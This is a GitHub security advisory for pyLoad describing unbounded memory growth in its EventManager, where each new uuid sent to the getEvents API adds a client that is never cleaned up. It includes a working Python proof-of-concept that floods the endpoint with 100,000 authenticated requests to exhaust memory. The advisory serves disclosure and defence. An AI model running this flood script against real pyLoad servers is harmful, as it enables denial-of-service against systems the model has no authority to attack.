GHSA-c2f9-4mc8-j656: pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager
Description:
The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.
Vulnerable Code:
https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17
Here the client is added to the clients list but never cleared the inactive clients.
Exploitation:
1. Start pyLoad server (Ensure the pyload server is running)
2. Authenticate: Obtain a session cookie or an API key (Here i used the API key).
3. Send Requests: Run the below poc script to send a large number of requests to the getEvents API endpoint, each with a unique uuid.
import requests
import uuid
import time
Configuration
URL = "http://localhost:8000/api/getEvents"
NUM_REQUESTS = 100000
headers = {
"X-API-Key" : "<YOUR_APIKEY>"
}
print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...")
for i in range(NUM_REQUESTS):
Generating a new UUID
uid = str(uuid.uuid4())
try:
Sending request
requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5)
if i % 1000 == 0:
print(f"Sent {i} requests...")
except requests.exceptions.RequestException as e:
print(f"Error at request {i}: {e}")
break
print("Attack complete. Check memory usage.")
5. Monitor Memory: Monitor the memory usage of the pyload process (e.g., using top, ps or the following commands).
PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done
6. Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests
Details
Original advisory: https://github.com/advisories/GHSA-c2f9-4mc8-j656
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-48987 | coverage & exploitation status | NVD · CVE.org |
More from GitHub Security Advisories
- criticalGHSA-g936-7jqj-mwv8: TSDProxy: Internal proxy auth token forwarded to backend services enables management API …2026-07-10
- highGHSA-fpg8-7664-jc5q: melange: Incomplete package integrity verification allows data section substitution2026-07-10
- mediumGHSA-48rx-c7pg-q66r: Excon does not redact additional sensitive/risky headers when following redirects2026-07-10
- highGHSA-h4g2-xfmw-q2c9: Clauster: Non-loopback deployments can serve the dashboard unauthenticated when auth.enab…2026-07-10
- mediumGHSA-rqq5-2gf9-4w4q: Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when giv…2026-07-10